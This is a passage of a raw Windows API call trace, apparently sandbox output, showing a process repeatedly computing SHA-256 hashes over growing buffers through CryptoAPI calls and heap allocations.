dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.683] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.683] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0183.683] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.683] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71c10 [0183.683] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71c10, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71c10, pdwDataLen=0xcdfdc) returned 1 [0183.683] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.683] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.683] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.684] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.684] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0183.684] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71a00 [0183.684] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71a00, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71a00, pdwDataLen=0xcdfdc) returned 1 [0183.684] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.684] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.684] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0183.685] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.685] CryptHashData (hHash=0x3396ee80, pbData=0x32e786e0, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0183.685] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.685] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71c40 [0183.685] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x2, pbData=0x32e71c40, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71c40, pdwDataLen=0xcdfdc) returned 1 [0183.685] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0183.685] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0183.685] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.686] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.686] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0183.686] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.686] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71ac0 [0183.686] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71ac0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71ac0, pdwDataLen=0xcdfdc) returned 1 [0183.686] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.686] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.686] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.686] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.686] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0183.686] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.686] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71a30 [0183.687] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71a30, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71a30, pdwDataLen=0xcdfdc) returned 1 [0183.687] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.687] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.687] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.687] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.687] CryptHashData (hHash=0x3396f5f0, pbData=0x32e786e0, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0183.687] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.687] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71af0 [0183.687] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e71af0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71af0, pdwDataLen=0xcdfdc) returned 1 [0183.687] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0183.687] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.687] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.688] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.688] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0183.688] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.688] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71dc0 [0183.688] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e71dc0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71dc0, pdwDataLen=0xcdfdc) returned 1 [0183.688] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.688] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.688] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0183.688] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.689] CryptHashData (hHash=0x3396ea90, pbData=0x32e786e0, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0183.689] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.689] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71b50 [0183.689] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e71b50, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71b50, pdwDataLen=0xcdfdc) returned 1 [0183.689] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0183.689] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0183.689] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0183.689] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.689] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0183.689] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.689] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71bb0 [0183.689] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71bb0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71bb0, pdwDataLen=0xcdfdc) returned 1 [0183.689] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.689] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0183.689] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.690] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.690] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0183.690] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.690] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71760 [0183.690] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71760, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71760, pdwDataLen=0xcdfdc) returned 1 [0183.690] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.690] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.690] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0183.691] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.691] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0183.691] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.691] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71c70 [0183.691] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71c70, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71c70, pdwDataLen=0xcdfdc) returned 1 [0183.691] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.691] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0183.691] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0183.691] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.691] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0183.691] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.691] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71ca0 [0183.691] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71ca0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71ca0, pdwDataLen=0xcdfdc) returned 1 [0183.692] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.692] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0183.692] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0183.692] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.692] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0183.692] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.692] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71d30 [0183.692] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71d30, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71d30, pdwDataLen=0xcdfdc) returned 1 [0183.692] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.692] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0183.692] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.693] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.693] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0183.693] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.693] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71d60 [0183.693] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71d60, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71d60, pdwDataLen=0xcdfdc) returned 1 [0183.693] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.693] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.693] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0183.694] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.694] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0183.694] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.694] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71d90 [0183.694] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71d90, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71d90, pdwDataLen=0xcdfdc) returned 1 [0183.694] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.694] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0183.694] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0183.694] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.694] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0183.694] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.694] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71790 [0183.694] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e71790, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71790, pdwDataLen=0xcdfdc) returned 1 [0183.694] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.694] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0183.694] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0183.695] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.695] CryptHashData (hHash=0x3396eb70, pbData=0x32e786e0, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0183.695] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e717c0 [0183.695] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32e717c0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e717c0, pdwDataLen=0xcdfdc) returned 1 [0183.695] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.695] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0183.695] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.696] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.696] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0183.696] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.696] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66f70 [0183.696] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e66f70, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66f70, pdwDataLen=0xcdfdc) returned 1 [0183.696] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.696] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.696] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0183.696] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.697] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0183.697] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.697] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66be0 [0183.697] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e66be0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66be0, pdwDataLen=0xcdfdc) returned 1 [0183.697] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.697] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0183.697] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.697] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.697] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0183.697] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.697] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67600 [0183.697] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e67600, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67600, pdwDataLen=0xcdfdc) returned 1 [0183.697] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.697] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.697] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0183.698] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.698] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0183.698] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.698] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66c70 [0183.698] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.699] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0183.699] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.699] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.699] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0183.699] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e69100 [0183.699] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.699] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.699] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.700] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.700] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0183.700] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82fe0 [0183.700] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.700] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.700] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.700] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.700] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0183.700] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e837c0 [0183.700] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.701] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.701] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e786e0 | out: hHeap=0x2150000) returned 1 [0183.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e8a230 [0183.701] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.701] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.701] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x20, dwFlags=0x0) returned 1 [0183.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83670 [0183.701] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.701] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.701] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.702] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.702] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x40, dwFlags=0x0) returned 1 [0183.702] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e831f0 [0183.702] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.702] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.702] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.703] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.703] CryptHashData (hHash=0x3396ee80, pbData=0x32e8a230, dwDataLen=0x60, dwFlags=0x0) returned 1 [0183.703] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83a60 [0183.703] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0183.703] 